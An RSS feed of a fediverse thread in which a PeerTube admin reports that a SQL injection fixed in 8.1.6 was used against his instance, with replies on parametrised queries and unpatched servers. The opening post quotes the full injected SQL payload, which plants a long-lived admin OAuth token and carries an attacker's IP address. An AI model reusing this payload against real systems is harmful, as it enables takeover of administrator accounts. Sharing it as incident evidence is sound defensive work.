<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6.]]></title><description><![CDATA[<p>Today's fun adventure with <a href="https://some.apz.fi/tags/peertube" rel="tag">#<span>peertube</span></a> involves the <a href="https://some.apz.fi/tags/exploit" rel="tag">#<span>exploit</span></a> fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:</p><blockquote><p>Xhttp://20.240.202.159:8777/x');DO/<strong>/$f$/</strong>/DECLARE/<strong>/uid/</strong>/INT;/<strong>/cid/</strong>/INT;/<strong>/BEGIN/</strong>/EXECUTE/<strong>/'SELECT/</strong>/id/<strong>/FROM/</strong>/'||quote_ident('user')||'/<strong>/WHERE/</strong>/role=0/<strong>/LIMIT/</strong>/1'/<strong>/INTO/</strong>/uid;/<strong>/EXECUTE/</strong>/'SELECT/<strong>/id/</strong>/FROM/<strong>/'||quote_ident('oAuthClient')||'/</strong>/LIMIT/<strong>/1'/</strong>/INTO/<strong>/cid;/</strong>/EXECUTE/<strong>/'INSERT/</strong>/INTO/<strong>/'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')/</strong>/VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';/<strong>/END/</strong>/$f$;-- </p></blockquote><p>So this worked because they had a ' after the URL. <a href="https://some.apz.fi/tags/infosec" rel="tag">#<span>infosec</span></a></p>]]></description><link>https://board.circlewithadot.net/topic/c382fb08-35ee-4c0f-9a4f-9f918dea1269/today-s-fun-adventure-with-peertube-involves-the-exploit-fixed-in-8.1.6.</link><generator>RSS for Node</generator><lastBuildDate>Mon, 25 May 2026 06:31:03 GMT</lastBuildDate><atom:link href="https://board.circlewithadot.net/topic/c382fb08-35ee-4c0f-9a4f-9f918dea1269.rss" rel="self" type="application/rss+xml"/><pubDate>Sat, 23 May 2026 09:54:12 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 19:43:34 GMT]]></title><description><![CDATA[<p>Looking at my Peertube instances logs, there's A LOT of old versions out there. I think a log of instances seem to be install and forget when it comes to maintenance.</p>]]></description><link>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625599008094562</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625599008094562</guid><dc:creator><![CDATA[apz@some.apz.fi]]></dc:creator><pubDate>Sat, 23 May 2026 19:43:34 GMT</pubDate></item><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 19:07:29 GMT]]></title><description><![CDATA[<p><span><a href="/user/ghard%40mastodon.social" rel="nofollow noopener">@<span>ghard</span></a></span> Back like in early 00s I made my own. Very ghetto, but does everything I want it to do.</p><p>"Spaghetti code!" they said.</p><p>"It's not modern!"</p><p>Well, the patching day for it isn't every day.</p>]]></description><link>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625457100246112</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116625457100246112</guid><dc:creator><![CDATA[apz@some.apz.fi]]></dc:creator><pubDate>Sat, 23 May 2026 19:07:29 GMT</pubDate></item><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 11:16:08 GMT]]></title><description><![CDATA[<p><span><a href="/user/apz%40some.apz.fi">@<span>apz</span></a></span> LOL very timely, just on that note, say hello to CVE-2026-9082<br />Not that I would trust Drupal or any other modern or ancient CMS any longer than I could throw it.</p>]]></description><link>https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623603668336757</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623603668336757</guid><dc:creator><![CDATA[ghard@mastodon.social]]></dc:creator><pubDate>Sat, 23 May 2026 11:16:08 GMT</pubDate></item><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:58:02 GMT]]></title><description><![CDATA[<p><span><a href="/user/apz%40some.apz.fi">@<span>apz</span></a></span> sigh yeah. <br />I spent a few decades in the industry actually implementing relational database engines, and being at clients' premises with their "expert developers" and seeing them draw a blank when mentioning SQLPrepareStmt or similar... <br />I don't even want to go there anymore. Now with the AI deskilling I'm expecting things to become even worse. <br />Glad I dropped out and got to doing something more meaningful.</p>]]></description><link>https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623532543733847</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623532543733847</guid><dc:creator><![CDATA[ghard@mastodon.social]]></dc:creator><pubDate>Sat, 23 May 2026 10:58:02 GMT</pubDate></item><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:51:10 GMT]]></title><description><![CDATA[<p><span><a href="https://mastodon.social/@ghard" rel="nofollow noopener">@<span>ghard</span></a></span> I think the battle trying to explain new developers the concept is already lost. I've explained the problem to couple of project owners and people just don't seem to take it seriously. It's not like it's one of the most basic exploits, ever on the web.</p>]]></description><link>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623505542234264</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623505542234264</guid><dc:creator><![CDATA[apz@some.apz.fi]]></dc:creator><pubDate>Sat, 23 May 2026 10:51:10 GMT</pubDate></item><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:44:15 GMT]]></title><description><![CDATA[<p><span><a href="/user/apz%40some.apz.fi">@<span>apz</span></a></span> It’s not like RDBMS didn’t have parametrised queries since, like, the dawn of time <img src="https://board.circlewithadot.net/assets/plugins/nodebb-plugin-emoji/emoji/android/1f644.png?v=28325c671da" class="not-responsive emoji emoji-android emoji--face_with_rolling_eyes" style="height:23px;width:auto;vertical-align:middle" title="🙄" alt="🙄" /></p>]]></description><link>https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623478327575108</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://mastodon.social/users/ghard/statuses/116623478327575108</guid><dc:creator><![CDATA[ghard@mastodon.social]]></dc:creator><pubDate>Sat, 23 May 2026 10:44:15 GMT</pubDate></item><item><title><![CDATA[Reply to Today&#x27;s fun adventure with #peertube involves the #exploit fixed in 8.1.6. on Sat, 23 May 2026 10:02:02 GMT]]></title><description><![CDATA[<p>Apparently this was contained, the forementioned exploit to push the root auth tokens was the only thing. Apparently exploited instances get a plugin called peertube-plugin-google-analytics-js added to do something more or less funny, mine had nothing extra on it for now. Naturally all the passwords are now changed and everyone kicked out.</p><p>The 8.1.8 release adds a feature to limit root user's usefulness in an attack like this.</p>]]></description><link>https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623312350809194</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://some.apz.fi/ap/users/116031884338016573/statuses/116623312350809194</guid><dc:creator><![CDATA[apz@some.apz.fi]]></dc:creator><pubDate>Sat, 23 May 2026 10:02:02 GMT</pubDate></item></channel></rss>